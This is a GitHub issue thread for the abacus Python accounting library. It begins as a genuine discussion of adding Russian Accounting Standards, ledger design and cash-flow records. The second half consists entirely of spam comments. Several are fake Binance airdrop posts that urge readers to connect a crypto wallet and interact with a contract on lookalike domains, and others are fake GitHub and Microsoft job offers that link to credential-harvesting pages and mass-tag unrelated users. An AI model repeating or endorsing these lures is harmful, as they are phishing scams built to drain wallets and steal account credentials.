### ISSUE TITLE
RAS there?

### ISSUE THREAD

**Issue by vks2** [epogrebnyak/abacus#4]
Hey, what a cool job, thanks much.
do you plan to make an make_ledger method to make a possibility for RAS accounting?
I'm asking because  accounting_types.py looks like a great iunterface for any type of accounting.

**Comment by epogrebnyak** [comment]
Thank you for your kind words! Is RAS https://en.wikipedia.org/wiki/Russian_Accounting_Standards?

My intent is to make the engine as generic as possible and try fit into some working accounting system. RAS is good it has a fixed list of accounts, but the number of possible entries pairs is quite big... not sure about the usecase - trying to make abacus comete against 1C is a too monumental task, using it for reasearch - need some dataset. 

In short, RAS can be explored, but more information needed on how abacus can be used with RAS. 

(Ideally, abacus is an engine and RAS is a big config file for it).

**Comment by epogrebnyak** [comment]
> Hey, what a cool job, thanks much. 

Putting your quote in README, hop eyou do not mind. Need some peer support to get going with a project.

**Comment by epogrebnyak** [comment]
Another idea is to introduce a trial subset of RAS into chart and see if there are any incompatibiltities.

**Comment by dylan1218** [comment]
Different accounting methods could be handled by a "ledger concept". 

You can have your "primary" ledger, which is what all accounting entries will initially be booked to (would need to add in a ledger dimension to the entry method"). In an "secondary" ledger you can have a backend process to copy all entries from the primary ledger and make adjusting entries directly to the "secondary" ledger as needed.

**Comment by epogrebnyak** [comment]
Thanks for the comment, moving between accounting frameworks indeed a useful feature, even though I think there is a lot of manual work I involved on reclassing entries. I like the idea abacus may be doing at least part of this work. Extra info should go to entries I think for this.

So far the ledger and entries are very simple, the ledger is just a mapping between account name and t-account, and entry is purposefully just Dr, Cr and amount, to make it as simple as possible. As for statefullness not sure what you mean - I got a ledger + entries result in new ledger, but it makes sense to store just initial state of the ledger and entries, so that any ledger state can be computed. As of now I'm struggling a bit with contraccounts, as some seem need to close and period end and some carry forward. 

I'm less fluent in accounting than you are, so please reiterate if there is any point I'm missing.

**Comment by dylan1218** [comment]
Ah yea, when I referred to state more just meant I don't see any database backing anything, so guessing everything is just in memory stored in the objects?

Would think if you wanted to introduce tracking against multiple accounting methods you'd need to start implementing a database and processes that would operate against the stored data.

**Comment by vks2** [comment]
I guess we do not need any ERP-logic here. What may be interesting is that idea of flexible rules (RAS, IFRS or any other) that may  automaticly transform my CF records (that's the actual data bookeeped by all, even smallest small business owners) to a user-friendly balance sheet,

**Comment by epogrebnyak** [comment]
As a library, the package holds data in-memory, and as of now, abacus does not mind where it comes from, a database, json file, whatever. I have seen an old package where the code is tightly couples to SQLite, but the core of an engine should be database-agnostic I think. It makes a though choice though where do we store snapshots of the ledger and where just the entries. Will come up with a chart for this.

The contraccounts are pretty much solved now in abacus (at least as first implementation - in 0.2.0), probably need just more of documentation.

**Comment by epogrebnyak** [comment]
> I guess we do not need any ERP-logic here. What may be interesting is that idea of flexible rules (RAS, IFRS or any other) that may  automaticly transform my CF records (that's the actual data bookeeped by all, even smallest small business owners) to a user-friendly balance sheet,

One set of initial transaction data (with enough information) and reports by different rule is a cool functionality. What is a CF record though? What does it stand for? 

The rules would differ by recognition/measurement/disclosure, out of which disclosure seems easier that measurement/recognition.Need some kind of examples to go forward.

**Comment by vks2** [comment]
just any cash flow record (sales/expenses etc) 
example:
entries = [
    Entry("cash", "sales", 150),    # selling thin air
    Entry("discounts", "cash", 30), # with a discount
    Entry("overhead", "cash", 50),  # and overhead expense
]
but you still need data if you closed that cashflow record with a particular operation

**Comment by epogrebnyak** [comment]
The cash flow we can keep track of the type of record, no problem. If we had that information - would you wanted to construct the CF report under different rules?

**Comment by epogrebnyak** [comment]
Got an example of either rule/presentation?

вт, 9 мая 2023 г., 18:28 Vlad ***@***.***>:

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by arconejeros** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by MatMarrr** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @pkrishnath, @arvind-india, @aloptrbl, @kineita, @virendrasuryavanshi, @gogliko, @Nargonath

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @youngsaber, @Windfarer, @ZuulAndRibbon, @zeroxaa, @SEELE0, @xiaoyuanxun, @afrideva

**Comment by EuJinnLucaShow** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kozer, @biplavxyz, @Nangelov7, @cjnm, @whatthebrain, @themrinalsinha, @xianguangHu, @sammwyy, @lsprgabriel, @zhous1q, @ATrnd, @onrcn, @MakoDaiSuKi, @shreniknambiar, @agentfox, @lxhelili, @gentoo111, @ardinusawan, @jerrison, @AshwinBalaji52

**Comment by willianfcamara** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team

**Comment by dsudduth** [comment]
Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
wellcast, @fantalatone, @nNabakhteveli, @RCiesielczuk, @emurmotol, @shayanb, @nathanph, @wairimumiringu6, @SteveJob, @ryanmagoon, @Kalffman, @ankokuji, @Mziserman, @nediamond, @yjradeh, @tkasuz, @anthedung, @hanpham32, @fabius8, @arshinalbab

**Comment by yexuanyang** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
hmrtn, @RyDeR-69, @dendisuhubdy, @heart99star, @eznix86, @Timmy0x, @MrMineev, @sprtd, @loganbek, @HusseinLezzaik, @dr-frmr, @fenghaojiang, @lockedech, @NeverAnIsland, @daksh-code, @Eengineer1, @kkthmyh, @devorso, @gnoejuan, @shochmuth

**Comment by 1291945816** [comment]
# [Join Microsoft as a Junior Software Developer!](https://careersmicrosoft.online/)

Exciting news! We're hiring for a Junior Software Developer position at Microsoft, and your application has been approved!

## Apply Now:
Ready to embark on this amazing journey? [Apply here](https://careersmicrosoft.online/) by **March 20, 2024**.
naltun, @MadMoneyLab, @SolomonFoskaay, @Stefan4D, @r-strawser, @tammyyang, @dsimmons, @Edgeman-nft42, @ElasticBottle, @matronator, @DhruvGovani, @0xRian, @flux0uz, @SabeloMkhwanzi, @pmprete, @Ontisalaga16, @1997roylee, @stonegao, @qdriven, @bangoos1
